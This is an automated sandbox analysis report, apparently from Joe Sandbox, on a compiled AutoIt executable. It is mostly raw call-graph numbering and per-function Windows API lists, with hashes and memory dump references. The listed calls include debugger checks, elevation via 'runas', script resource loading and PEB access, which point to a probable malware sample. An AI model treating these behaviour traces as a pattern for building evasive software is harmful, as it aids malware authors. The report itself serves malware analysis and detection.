103495->103514 103499 2ee060 103499->103490 103500 2ee260 103501 2d2d55 _free 58 API calls 103500->103501 103502 2ee268 103501->103502 103503 2b4e4a 84 API calls 103502->103503 103508 2ee271 103503->103508 103507 2d2d55 _free 58 API calls 103507->103508 103508->103507 103509 2b4e4a 84 API calls 103508->103509 103621 30f7a1 89 API calls 4 library calls 103508->103621 103509->103508 103511 2b7de1 59 API calls 103511->103514 103514->103500 103514->103508 103514->103511 103616 30f73d 59 API calls 2 library calls 103514->103616 103617 30f65e 61 API calls 2 library calls 103514->103617 103618 31737f 59 API calls Mailbox 103514->103618 103619 2b750f 59 API calls 2 library calls 103514->103619 103620 2b735d 59 API calls Mailbox 103514->103620 103516 2b34d4 103515->103516 103520 2b34f3 _memmove 103515->103520 103518 2d0db6 Mailbox 59 API calls 103516->103518 103517 2d0db6 Mailbox 59 API calls 103519 2b350a 103517->103519 103518->103520 103519->103480 103520->103517 103521->103474 103523 2ee41e 103522->103523 103524 2b6ab5 103522->103524 103643 30f7a1 89 API calls 4 library calls 103523->103643 103627 2b57a6 60 API calls Mailbox 103524->103627 103527 2ee431 103644 30f7a1 89 API calls 4 library calls 103527->103644 103528 2b6ad7 103628 2b57f6 67 API calls 103528->103628 103530 2b6aec 103530->103527 103531 2b6af4 103530->103531 103533 2b7667 59 API calls 103531->103533 103535 2b6b00 103533->103535 103534 2ee44d 103537 2b6b61 103534->103537 103629 2d0957 60 API calls __write_nolock 103535->103629 103539 2b6b6f 103537->103539 103540 2ee460 103537->103540 103538 2b6b0c 103541 2b7667 59 API calls 103538->103541 103543 2b7667 59 API calls 103539->103543 103542 2b5c6f CloseHandle 103540->103542 103545 2b6b18 103541->103545 103546 2ee46c 103542->103546 103544 2b6b78 103543->103544 103547 2b7667 59 API calls 103544->103547 103548 2b4750 60 API calls 103545->103548 103549 2b4ddd 136 API calls 103546->103549 103550 2b6b81 103547->103550 103551 2b6b26 103548->103551 103552 2ee488 103549->103552 103554 2b459b 59 API calls 103550->103554 103630 2b5850 ReadFile SetFilePointerEx 103551->103630 103553 2ee4b1 103552->103553 103556 31955b 122 API calls 103552->103556 103645 30f7a1 89 API calls 4 library calls 103553->103645 103557 2b6b98 103554->103557 103560 2ee4a4 103556->103560 103561 2b7b2e 59 API calls 103557->103561 103559 2b6b52 103631 2b5aee SetFilePointerEx SetFilePointerEx 103559->103631 103564 2ee4ac 103560->103564 103565 2ee4cd 103560->103565 103566 2b6ba9 SetCurrentDirectoryW 103561->103566 103562 2ee4c8 103570 2b6d0c Mailbox 103562->103570 103567 2b4e4a 84 API calls 103564->103567 103568 2b4e4a 84 API calls 103565->103568 103572 2b6bbc Mailbox 103566->103572 103567->103553 103569 2ee4d2 103568->103569 103571 2d0db6 Mailbox 59 API calls 103569->103571 103622 2b57d4 103570->103622 103577 2ee506 103571->103577 103574 2d0db6 Mailbox 59 API calls 103572->103574 103576 2b6bcf 103574->103576 103575 2b3bbb 103575->103211 103575->103220 103578 2b522e 59 API calls 103576->103578 103646 2b750f 59 API calls 2 library calls 103577->103646 103587 2b6bda Mailbox __NMSG_WRITE 103578->103587 103580 2b6ce7 103639 2b5c6f 103580->103639 103582 2ee740 103652 3172df 59 API calls Mailbox 103582->103652 103587->103580 103592 2ee7d9 103587->103592 103598 2ee7d1 103587->103598 103600 2b7de1 59 API calls 103587->103600 103632 2b586d 67 API calls _wcscpy 103587->103632 103633 2b6f5d GetStringTypeW 103587->103633 103634 2b6ecc 60 API calls __wcsnicmp 103587->103634 103635 2b6faa GetStringTypeW __NMSG_WRITE 103587->103635 103636 2d363d GetStringTypeW _iswctype 103587->103636 103637 2b68dc 165 API calls 3 library calls 103587->103637 103638 2b7213 59 API calls Mailbox 103587->103638 103588 2ee762 103656 30f7a1 89 API calls 4 library calls 103592->103656 103597 2ee7f2 103597->103580 103655 30f5f7 59 API calls 4 library calls 103598->103655 103600->103587 103605 2b7de1 59 API calls 103612 2ee54f Mailbox 103605->103612 103609 2ee792 103654 30f7a1 89 API calls 4 library calls 103609->103654 103611 2ee7ab 103612->103582 103612->103605 103612->103609 103647 30f73d 59 API calls 2 library calls 103612->103647 103648 30f65e 61 API calls 2 library calls 103612->103648 103649 31737f 59 API calls Mailbox 103612->103649 103650 2b750f 59 API calls 2 library calls 103612->103650 103651 2b7213 59 API calls Mailbox 103612->103651 103615->103499 103616->103514 103617->103514 103618->103514 103619->103514 103620->103514 103621->103508 103623 2b5c6f CloseHandle 103622->103623 103624 2b57dc Mailbox 103623->103624 103625 2b5c6f CloseHandle 103624->103625 103626 2b57eb 103625->103626 103626->103575 103627->103528 103628->103530 103629->103538 103630->103559 103631->103537 103632->103587 103633->103587 103634->103587 103635->103587 103636->103587 103637->103587 103638->103587 103640 2b5c79 103639->103640 103641 2b5c88 103639->103641 103641->103640 103643->103527 103644->103534 103645->103562 103646->103612 103647->103612 103648->103612 103649->103612 103650->103612 103651->103612 103652->103588 103654->103611 103655->103592 103656->103597 103675 2b1016 103680 2b4974 103675->103680 103678 2d2d40 __cinit 67 API calls 103679 2b1025 103678->103679 103681 2d0db6 Mailbox 59 API calls 103680->103681 103682 2b497c 103681->103682 103683 2b101b 103682->103683 103687 2b4936 103682->103687 103683->103678 103688 2b493f 103687->103688 103689 2b4951 103687->103689 103690 2d2d40 __cinit 67 API calls 103688->103690 103691 2b49a0 103689->103691 103690->103689 103692 2b7667 59 API calls 103691->103692 103693 2b49b8 GetVersionExW 103692->103693 103694 2b7bcc 59 API calls 103693->103694 103695 2b49fb 103694->103695 103696 2b7d2c 59 API calls 103695->103696 103701 2b4a28 103695->103701 103697 2b4a1c 103696->103697 103698 2b7726 59 API calls 103697->103698 103698->103701 103699 2b4a93 GetCurrentProcess IsWow64Process 103700 2b4aac 103699->103700 103703 2b4b2b GetSystemInfo 103700->103703 103704 2b4ac2 103700->103704 103701->103699 103702 2ed864 103701->103702 103705 2b4af8 103703->103705 103715 2b4b37 103704->103715 103705->103683 103708 2b4b1f GetSystemInfo 103710 2b4ae9 103708->103710 103709 2b4ad4 103711 2b4b37 2 API calls 103709->103711 103710->103705 103712 2b4aef FreeLibrary 103710->103712 103713 2b4adc GetNativeSystemInfo 103711->103713 103712->103705 103713->103710 103716 2b4ad0 103715->103716 103717 2b4b40 LoadLibraryA 103715->103717 103716->103708 103716->103709 103717->103716 103718 2b4b51 GetProcAddress 103717->103718 103718->103716 103719 2b1066 103724 2bf76f 103719->103724 103721 2b106c 103722 2d2d40 __cinit 67 API calls 103721->103722 103723 2b1076 103722->103723 103725 2bf790 103724->103725 103757 2cff03 103725->103757 103729 2bf7d7 103730 2b7667 59 API calls 103729->103730 103731 2bf7e1 103730->103731 103732 2b7667 59 API calls 103731->103732 103733 2bf7eb 103732->103733 103734 2b7667 59 API calls 103733->103734 103735 2bf7f5 103734->103735 103736 2b7667 59 API calls 103735->103736 103737 2bf833 103736->103737 103738 2b7667 59 API calls 103737->103738 103739 2bf8fe 103738->103739 103767 2c5f87 103739->103767 103743 2bf930 103744 2b7667 59 API calls 103743->103744 103745 2bf93a 103744->103745 103795 2cfd9e 103745->103795 103747 2bf981 103748 2bf991 GetStdHandle 103747->103748 103749 2f45ab 103748->103749 103750 2bf9dd 103748->103750 103749->103750 103752 2f45b4 103749->103752 103751 2bf9e5 OleInitialize 103750->103751 103751->103721 103802 316b38 64 API calls Mailbox 103752->103802 103754 2f45bb 103803 317207 CreateThread 103754->103803 103756 2f45c7 CloseHandle 103756->103751 103804 2cffdc 103757->103804 103760 2cffdc 59 API calls 103761 2cff45 103760->103761 103762 2b7667 59 API calls 103761->103762 103763 2cff51 103762->103763 103764 2b7bcc 59 API calls 103763->103764 103765 2bf796 103764->103765 103766 2d0162 6 API calls 103765->103766 103766->103729 103768 2b7667 59 API calls 103767->103768 103769 2c5f97 103768->103769 103770 2b7667 59 API calls 103769->103770 103771 2c5f9f 103770->103771 103811 2c5a9d 103771->103811 103774 2c5a9d 59 API calls 103775 2c5faf 103774->103775 103776 2b7667 59 API calls 103775->103776 103777 2c5fba 103776->103777 103778 2d0db6 Mailbox 59 API calls 103777->103778 103779 2bf908 103778->103779 103780 2c60f9 103779->103780 103781 2c6107 103780->103781 103782 2b7667 59 API calls 103781->103782 103783 2c6112 103782->103783 103784 2b7667 59 API calls 103783->103784 103785 2c611d 103784->103785 103786 2b7667 59 API calls 103785->103786 103787 2c6128 103786->103787 103788 2b7667 59 API calls 103787->103788 103789 2c6133 103788->103789 103790 2c5a9d 59 API calls 103789->103790 103791 2c613e 103790->103791 103792 2d0db6 Mailbox 59 API calls 103791->103792 103793 2c6145 RegisterWindowMessageW 103792->103793 103793->103743 103796 2cfdae 103795->103796 103797 30576f 103795->103797 103798 2d0db6 Mailbox 59 API calls 103796->103798 103814 319ae7 60 API calls 103797->103814 103800 2cfdb6 103798->103800 103800->103747 103801 30577a 103802->103754 103803->103756 103815 3171ed 65 API calls 103803->103815 103805 2b7667 59 API calls 103804->103805 103806 2cffe7 103805->103806 103807 2b7667 59 API calls 103806->103807 103808 2cffef 103807->103808 103809 2b7667 59 API calls 103808->103809 103810 2cff3b 103809->103810 103810->103760 103812 2b7667 59 API calls 103811->103812 103813 2c5aa5 103812->103813 103813->103774 103814->103801 103816 2b1055 103821 2b2649 103816->103821 103819 2d2d40 __cinit 67 API calls 103820 2b1064 103819->103820 103822 2b7667 59 API calls 103821->103822 103823 2b26b7 103822->103823 103828 2b3582 103823->103828 103825 2b2754 103827 2b105a 103825->103827 103831 2b3416 59 API calls 2 library calls 103825->103831 103827->103819 103832 2b35b0 103828->103832 103831->103825 103833 2b35a1 103832->103833 103834 2b35bd 103832->103834 103833->103825 103834->103833 103835 2b35c4 RegOpenKeyExW 103834->103835 103835->103833 103836 2b35de RegQueryValueExW 103835->103836 103837 2b35ff 103836->103837 103838 2b3614 RegCloseKey 103836->103838 103837->103838 103838->103833 103839 116acf8 103853 1168938 103839->103853 103841 116adcc 103856 116abe8 103841->103856 103859 116be18 GetPEB 103853->103859 103855 1168fc3 103855->103841 103857 116abf1 Sleep 103856->103857 103858 116abff 103857->103858 103860 116be42 103859->103860 103860->103855

                                                                                                                    Executed Functions

                                                                                                                    Function 002B3B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002B3B68
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 002B3B7A
                                                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,003752F8,003752E0,?,?), ref: 002B3BEB
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                      • Part of subcall function 002C092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,002B3C14,003752F8,?,?,?), ref: 002C096E
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002B3C6F
                                                                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00367770,00000010), ref: 002ED281
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,003752F8,?,?,?), ref: 002ED2B9
                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00364260,003752F8,?,?,?), ref: 002ED33F
                                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 002ED346
                                                                                                                      • Part of subcall function 002B3A46: GetSysColorBrush.USER32(0000000F), ref: 002B3A50
                                                                                                                      • Part of subcall function 002B3A46: LoadCursorW.USER32(00000000,00007F00), ref: 002B3A5F
                                                                                                                      • Part of subcall function 002B3A46: LoadIconW.USER32(00000063), ref: 002B3A76
                                                                                                                      • Part of subcall function 002B3A46: LoadIconW.USER32(000000A4), ref: 002B3A88
                                                                                                                      • Part of subcall function 002B3A46: LoadIconW.USER32(000000A2), ref: 002B3A9A
                                                                                                                      • Part of subcall function 002B3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002B3AC0
                                                                                                                      • Part of subcall function 002B3A46: RegisterClassExW.USER32(?), ref: 002B3B16
                                                                                                                      • Part of subcall function 002B39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002B3A03
                                                                                                                      • Part of subcall function 002B39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002B3A24
                                                                                                                      • Part of subcall function 002B39D5: ShowWindow.USER32(00000000,?,?), ref: 002B3A38
                                                                                                                      • Part of subcall function 002B39D5: ShowWindow.USER32(00000000,?,?), ref: 002B3A41
                                                                                                                      • Part of subcall function 002B434A: _memset.LIBCMT ref: 002B4370
                                                                                                                      • Part of subcall function 002B434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 002B4415
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                    • String ID: This is a third-party compiled AutoIt script.$runas$%4
                                                                                                                    • API String ID: 529118366-2314548288
                                                                                                                    • Opcode ID: ad1b51032b9b6b9f21b1e5aa88762a417b2746cae902473b0c375d2e82e7bc78
                                                                                                                    • Instruction ID: 0f3a10483a9a77b48c249b6e3aea5cede4d94cb8b4a80102e02507ccaad3a276
                                                                                                                    • Opcode Fuzzy Hash: ad1b51032b9b6b9f21b1e5aa88762a417b2746cae902473b0c375d2e82e7bc78
                                                                                                                    • Instruction Fuzzy Hash: 69512630D24249AEDB26EBF4DC45EED7B78AF44790F40846AF415B21A3CAB05661CF20
                                                                                                                    Function 002B49A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 983 2b49a0-2b4a00 call 2b7667 GetVersionExW call 2b7bcc 988 2b4b0b-2b4b0d 983->988 989 2b4a06 983->989 990 2ed767-2ed773 988->990 991 2b4a09-2b4a0e 989->991 992 2ed774-2ed778 990->992 993 2b4b12-2b4b13 991->993 994 2b4a14 991->994 996 2ed77a 992->996 997 2ed77b-2ed787 992->997 995 2b4a15-2b4a4c call 2b7d2c call 2b7726 993->995 994->995 1005 2b4a52-2b4a53 995->1005 1006 2ed864-2ed867 995->1006 996->997 997->992 999 2ed789-2ed78e 997->999 999->991 1001 2ed794-2ed79b 999->1001 1001->990 1003 2ed79d 1001->1003 1007 2ed7a2-2ed7a5 1003->1007 1005->1007 1008 2b4a59-2b4a64 1005->1008 1009 2ed869 1006->1009 1010 2ed880-2ed884 1006->1010 1011 2ed7ab-2ed7c9 1007->1011 1012 2b4a93-2b4aaa GetCurrentProcess IsWow64Process 1007->1012 1013 2b4a6a-2b4a6c 1008->1013 1014 2ed7ea-2ed7f0 1008->1014 1015 2ed86c 1009->1015 1017 2ed86f-2ed878 1010->1017 1018 2ed886-2ed88f 1010->1018 1011->1012 1016 2ed7cf-2ed7d5 1011->1016 1019 2b4aaf-2b4ac0 1012->1019 1020 2b4aac 1012->1020 1021 2b4a72-2b4a75 1013->1021 1022 2ed805-2ed811 1013->1022 1025 2ed7fa-2ed800 1014->1025 1026 2ed7f2-2ed7f5 1014->1026 1015->1017 1023 2ed7df-2ed7e5 1016->1023 1024 2ed7d7-2ed7da 1016->1024 1017->1010 1018->1015 1027 2ed891-2ed894 1018->1027 1028 2b4b2b-2b4b35 GetSystemInfo 1019->1028 1029 2b4ac2-2b4ad2 call 2b4b37 1019->1029 1020->1019 1030 2b4a7b-2b4a8a 1021->1030 1031 2ed831-2ed834 1021->1031 1033 2ed81b-2ed821 1022->1033 1034 2ed813-2ed816 1022->1034 1023->1012 1024->1012 1025->1012 1026->1012 1027->1017 1032 2b4af8-2b4b08 1028->1032 1040 2b4b1f-2b4b29 GetSystemInfo 1029->1040 1041 2b4ad4-2b4ae1 call 2b4b37 1029->1041 1036 2ed826-2ed82c 1030->1036 1037 2b4a90 1030->1037 1031->1012 1039 2ed83a-2ed84f 1031->1039 1033->1012 1034->1012 1036->1012 1037->1012 1042 2ed859-2ed85f 1039->1042 1043 2ed851-2ed854 1039->1043 1044 2b4ae9-2b4aed 1040->1044 1048 2b4b18-2b4b1d 1041->1048 1049 2b4ae3-2b4ae7 GetNativeSystemInfo 1041->1049 1042->1012 1043->1012 1044->1032 1046 2b4aef-2b4af2 FreeLibrary 1044->1046 1046->1032 1048->1049 1049->1044
                                                                                                                    APIs
                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 002B49CD
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                    • GetCurrentProcess.KERNEL32(?,0033FAEC,00000000,00000000,?), ref: 002B4A9A
                                                                                                                    • IsWow64Process.KERNEL32(00000000), ref: 002B4AA1
                                                                                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 002B4AE7
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 002B4AF2
                                                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 002B4B23
                                                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 002B4B2F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1986165174-0
                                                                                                                    • Opcode ID: d02a324e1006189ef5e8c140a54c966e76bc7ec09489c90f8165889b17f71321
                                                                                                                    • Instruction ID: 1689bed930726c78d2fb648f1989527f3f08d04c35d3655235da23899e1b118c
                                                                                                                    • Opcode Fuzzy Hash: d02a324e1006189ef5e8c140a54c966e76bc7ec09489c90f8165889b17f71321
                                                                                                                    • Instruction Fuzzy Hash: 1091E6319A97C1DEC731EF7884A01EAFFF5AF2A340F84496DD0C793A42D260A558C759
                                                                                                                    Function 002B4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1080 2b4e89-2b4ea1 CreateStreamOnHGlobal 1081 2b4ea3-2b4eba FindResourceExW 1080->1081 1082 2b4ec1-2b4ec6 1080->1082 1083 2b4ec0 1081->1083 1084 2ed933-2ed942 LoadResource 1081->1084 1083->1082 1084->1083 1085 2ed948-2ed956 SizeofResource 1084->1085 1085->1083 1086 2ed95c-2ed967 LockResource 1085->1086 1086->1083 1087 2ed96d-2ed975 1086->1087 1088 2ed979-2ed98b 1087->1088 1088->1083
                                                                                                                    APIs
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,002B4D8E,?,?,00000000,00000000), ref: 002B4E99
                                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002B4D8E,?,?,00000000,00000000), ref: 002B4EB0
                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,002B4D8E,?,?,00000000,00000000,?,?,?,?,?,?,002B4E2F), ref: 002ED937
                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,002B4D8E,?,?,00000000,00000000,?,?,?,?,?,?,002B4E2F), ref: 002ED94C
                                                                                                                    • LockResource.KERNEL32(002B4D8E,?,?,002B4D8E,?,?,00000000,00000000,?,?,?,?,?,?,002B4E2F,00000000), ref: 002ED95F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                    • String ID: SCRIPT
                                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                                    • Opcode ID: a5bf058c34571d6897eac299457281e9553ae4e40e50abaee8b9e804f6a69540
                                                                                                                    • Instruction ID: 0122625653d9f12f19ed78953aeae387fbadcc16485c543c263e41697b1fee76
                                                                                                                    • Opcode Fuzzy Hash: a5bf058c34571d6897eac299457281e9553ae4e40e50abaee8b9e804f6a69540
                                                                                                                    • Instruction Fuzzy Hash: 23119A74640701BFE7229F65EC88FA77BBEFBC5B51F204668F406C6261DB61E8008A60
                                                                                                                    Function 002BFCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: pb7$%4
                                                                                                                    • API String ID: 3964851224-2664033170
                                                                                                                    • Opcode ID: e954c6a217a1ff146e861a0a1ad6462ecf085c96068491ec8226bf8a96c16868
                                                                                                                    • Instruction ID: 1636709e7a356a21abdbb28c4dee97cb64d8b7031c865c6c2773fb96570954ee
                                                                                                                    • Opcode Fuzzy Hash: e954c6a217a1ff146e861a0a1ad6462ecf085c96068491ec8226bf8a96c16868
                                                                                                                    • Instruction Fuzzy Hash: F2926970628341CFD720DF14C480B6AB7E5BF89344F14896DE99A8B362D7B1EC65CB92
                                                                                                                    Function 002BE6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Dd7$Dd7$Dd7$Dd7$Variable must be of type 'Object'.
                                                                                                                    • API String ID: 0-3687393284
                                                                                                                    • Opcode ID: 93e0b5058c70b2d2861b824a8f3e625c809efb632c9e5f1a6b1b2b404a2e2dd3
                                                                                                                    • Instruction ID: 79fdb24860284781f347b401f7ed50be7a94d0e513b32ea90724c5474a7ab3a2
                                                                                                                    • Opcode Fuzzy Hash: 93e0b5058c70b2d2861b824a8f3e625c809efb632c9e5f1a6b1b2b404a2e2dd3
                                                                                                                    • Instruction Fuzzy Hash: 55A28D74A2020ACFCF24CF58C490AEAB7B5FF58394F258469D9199B351D770EDA2CB90
                                                                                                                    Function 0031445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,002EE398), ref: 0031446A
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 0031447B
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0031448B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 48322524-0
                                                                                                                    • Opcode ID: 6d46eaac7fc394f5b2a0ac1588b0aa2b76d3b85ff0097177a545c6bc0a9c90a3
                                                                                                                    • Instruction ID: 75b03522e5544ac8c6c3e17c03dca0b386747db0d81010b6ae32078d93fd7214
                                                                                                                    • Opcode Fuzzy Hash: 6d46eaac7fc394f5b2a0ac1588b0aa2b76d3b85ff0097177a545c6bc0a9c90a3
                                                                                                                    • Instruction Fuzzy Hash: DDE0D837814501AB82156B38EC4D8EA775C9F09335F500B15F835C20E0EB74994096D5
                                                                                                                    Function 002C09D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002C0A5B
                                                                                                                    • timeGetTime.WINMM ref: 002C0D16
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002C0E53
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 002C0E61
                                                                                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 002C0EFA
                                                                                                                    • DestroyWindow.USER32 ref: 002C0F06
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002C0F20
                                                                                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 002F4E83
                                                                                                                    • TranslateMessage.USER32(?), ref: 002F5C60
                                                                                                                    • DispatchMessageW.USER32(?), ref: 002F5C6E
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002F5C82
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
